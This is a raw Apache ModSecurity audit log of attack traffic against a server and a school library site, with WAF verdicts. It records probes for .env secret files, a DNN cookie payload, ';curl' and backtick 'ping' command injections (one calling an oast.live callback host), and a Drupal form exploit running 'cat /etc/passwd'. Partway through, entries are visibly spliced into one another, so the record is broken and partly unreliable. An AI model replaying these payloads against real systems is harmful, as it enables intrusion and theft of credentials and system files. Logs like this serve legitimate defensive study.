AppleWebKit/537.21 (KHTML, like Gecko) konqueror/4.14.10 Safari/537.21 Accept-Charset: utf-8 --4f3d735c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f3d735c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748258760637208 611 (- - -) Stopwatch2: 1748258760637208 611; combined=264, p1=236, p2=0, p3=0, p4=0, p5=27, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f3d735c-Z-- --beaf6f13-A-- [26/May/2025:20:00:03 +0700] aDRl0_7lSIOiZEhmvSz40QAAAEg 103.236.140.4 55570 103.236.140.4 8181 --beaf6f13-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ANE-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --beaf6f13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --beaf6f13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748264403754822 818 (- - -) Stopwatch2: 1748264403754822 818; combined=360, p1=292, p2=0, p3=0, p4=0, p5=68, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --beaf6f13-Z-- --89d8326b-A-- [26/May/2025:20:25:31 +0700] aDRry_7lSIOiZEhmvSwLZgAAAFM 103.236.140.4 41400 103.236.140.4 8181 --89d8326b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 Accept-Charset: utf-8 --89d8326b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89d8326b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748265931350335 766 (- - -) Stopwatch2: 1748265931350335 766; combined=297, p1=264, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89d8326b-Z-- --0166ac15-A-- [26/May/2025:20:25:34 +0700] aDRrznFOzWd_Ai7zJXU1YAAAABY 103.236.140.4 41484 103.236.140.4 8181 --0166ac15-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.22 (KHTML like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22 Accept-Charset: utf-8 --0166ac15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0166ac15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748265934343486 703 (- - -) Stopwatch2: 1748265934343486 703; combined=308, p1=275, p2=0, p3=0, p4=0, p5=33, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0166ac15-Z-- --e516427c-A-- [26/May/2025:21:01:16 +0700] aDR0LFSmKJQK-9oQ9SQMYwAAAIk 103.236.140.4 44732 103.236.140.4 8181 --e516427c-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 64.225.75.246 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 64.225.75.246 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --e516427c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e516427c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748268076389541 1208 (- - -) Stopwatch2: 1748268076389541 1208; combined=342, p1=308, p2=0, p3=0, p4=0, p5=34, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e516427c-Z-- --1de68644-A-- [26/May/2025:21:58:23 +0700] aDSBj8-W3hHsdQpQwdQJmAAAAM0 103.236.140.4 47460 103.236.140.4 8181 --1de68644-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6 Accept-Charset: utf-8 --1de68644-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1de68644-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748271503085710 799 (- - -) Stopwatch2: 1748271503085710 799; combined=313, p1=274, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1de68644-Z-- --798fe82a-A-- [26/May/2025:21:59:28 +0700] aDSB0P7lSIOiZEhmvSxOhwAAAE4 103.236.140.4 49028 103.236.140.4 8181 --798fe82a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; JSN-AL00a Build/HONORJSN-AL00a; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/1961 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --798fe82a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --798fe82a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748271568845705 1123 (- - -) Stopwatch2: 1748271568845705 1123; combined=345, p1=300, p2=0, p3=0, p4=0, p5=45, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --798fe82a-Z-- --0241f838-A-- [26/May/2025:22:32:52 +0700] aDSJpM-W3hHsdQpQwdQjggAAAMg 103.236.140.4 43734 103.236.140.4 8181 --0241f838-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --0241f838-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0241f838-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748273572745446 749 (- - -) Stopwatch2: 1748273572745446 749; combined=361, p1=327, p2=0, p3=0, p4=0, p5=33, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0241f838-Z-- --012c0045-A-- [26/May/2025:23:18:29 +0700] aDSUVXFOzWd_Ai7zJXXB_AAAAA4 103.236.140.4 46286 103.236.140.4 8181 --012c0045-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Charset: utf-8 --012c0045-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --012c0045-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748276309568595 757 (- - -) Stopwatch2: 1748276309568595 757; combined=314, p1=275, p2=0, p3=0, p4=0, p5=39, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --012c0045-Z-- --a726b23e-A-- [26/May/2025:23:18:45 +0700] aDSUZXFOzWd_Ai7zJXXCHAAAABE 103.236.140.4 46748 103.236.140.4 8181 --a726b23e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) baidu.sogo.uc.Chrome/36.0.1985.125 Safari/537.36 Accept-Charset: utf-8 --a726b23e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a726b23e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748276325681313 690 (- - -) Stopwatch2: 1748276325681313 690; combined=239, p1=211, p2=0, p3=0, p4=0, p5=28, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a726b23e-Z-- --2a8e122f-A-- [26/May/2025:23:19:18 +0700] aDSUhnFOzWd_Ai7zJXXCkAAAABI 103.236.140.4 47638 103.236.140.4 8181 --2a8e122f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Accept-Charset: utf-8 --2a8e122f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a8e122f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748276358650060 795 (- - -) Stopwatch2: 1748276358650060 795; combined=344, p1=300, p2=0, p3=0, p4=0, p5=44, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a8e122f-Z-- --472f7708-A-- [26/May/2025:23:19:31 +0700] aDSUk8-W3hHsdQpQwdRSwAAAAMc 103.236.140.4 47982 103.236.140.4 8181 --472f7708-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34 Accept-Charset: utf-8 --472f7708-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --472f7708-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748276371065488 619 (- - -) Stopwatch2: 1748276371065488 619; combined=248, p1=210, p2=0, p3=0, p4=0, p5=38, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --472f7708-Z-- --bd6da004-A-- [26/May/2025:23:45:59 +0700] aDSax3FOzWd_Ai7zJXXS_QAAAAM 103.236.140.4 36106 103.236.140.4 8181 --bd6da004-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.55.127 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.55.127 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36 EdgA/119.0.0.0 --bd6da004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd6da004-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748277959160086 728 (- - -) Stopwatch2: 1748277959160086 728; combined=289, p1=255, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd6da004-Z-- --0213f24b-A-- [26/May/2025:23:45:59 +0700] aDSax1SmKJQK-9oQ9SSUswAAAII 103.236.140.4 36124 103.236.140.4 8181 --0213f24b-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.55.127 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.55.127 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36 EdgA/119.0.0.0 --0213f24b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0213f24b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748277959653457 563 (- - -) Stopwatch2: 1748277959653457 563; combined=227, p1=199, p2=0, p3=0, p4=0, p5=28, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0213f24b-Z-- --3a43b97a-A-- [26/May/2025:23:51:49 +0700] aDScJVSmKJQK-9oQ9SSbsgAAAI0 103.236.140.4 46792 103.236.140.4 8181 --3a43b97a-B-- GET /__ HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini X-Varnish: 166619968 --3a43b97a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a43b97a-E-- --3a43b97a-H-- Message: Access denied with code 403 (phase 2). Pattern match "WriteFileC:\Windows\win.ini X-Varnish: 168940504 --c615c909-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c615c909-E-- --c615c909-H-- Message: Access denied with code 403 (phase 2). Pattern match " --85681836-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --85681836-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748283281103150 6683 (- - -) Stopwatch2: 1748283281103150 6683; combined=5004, p1=542, p2=4313, p3=48, p4=73, p5=28, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85681836-Z-- --6e0bb15c-A-- [27/May/2025:01:14:41 +0700] aDSvkVSmKJQK-9oQ9STiqwAAAIY 103.236.140.4 55850 103.236.140.4 8181 --6e0bb15c-B-- POST /soap.cgi?service=whatever-control;curl HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 16 User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Content-Type: text/xml SOAPAction: "whatever-serviceType#whatever-action" X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168676360 --6e0bb15c-C-- whatever-content --6e0bb15c-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e0bb15c-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748283281104495 5877 (- - -) Stopwatch2: 1748283281104495 5877; combined=4492, p1=435, p2=3959, p3=29, p4=42, p5=26, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e0bb15c-Z-- --5010fb57-A-- [27/May/2025:01:14:41 +0700] aDSvkc-W3hHsdQpQwdTGcwAAANI 103.236.140.4 55866 103.236.140.4 8181 --5010fb57-B-- GET /card_scan.php?No=30&ReaderNo=%60ping%20d0q9cd1gpeook7mlf7sg3qt5ohdwyin97.oast.live%60 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168868858 --5010fb57-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5010fb57-E-- --5010fb57-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: `ping found within ARGS:ReaderNo: `ping d0q9cd1gpeook7mlf7sg3qt5ohdwyin97.oast.live`"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748283281118977 1789 (- - -) Stopwatch2: 1748283281118977 1789; combined=630, p1=474, p2=130, p3=0, p4=0, p5=26, sr=47, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5010fb57-Z-- --845c741a-A-- [27/May/2025:01:14:41 +0700] aDSvkc-W3hHsdQpQwdTGdQAAAMs 103.236.140.4 55866 103.236.140.4 8181 --845c741a-B-- POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.0 Referer: perpustakaan.smkn22jakarta.sch.id/user/register Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 631 User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 168868861 --845c741a-C-- -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" passthru -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#type]" markup -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#markup]" cat /etc/passwd -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="form_id" user_register_form -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="_drupal_ajax" --845c741a-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --845c741a-E-- --845c741a-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg 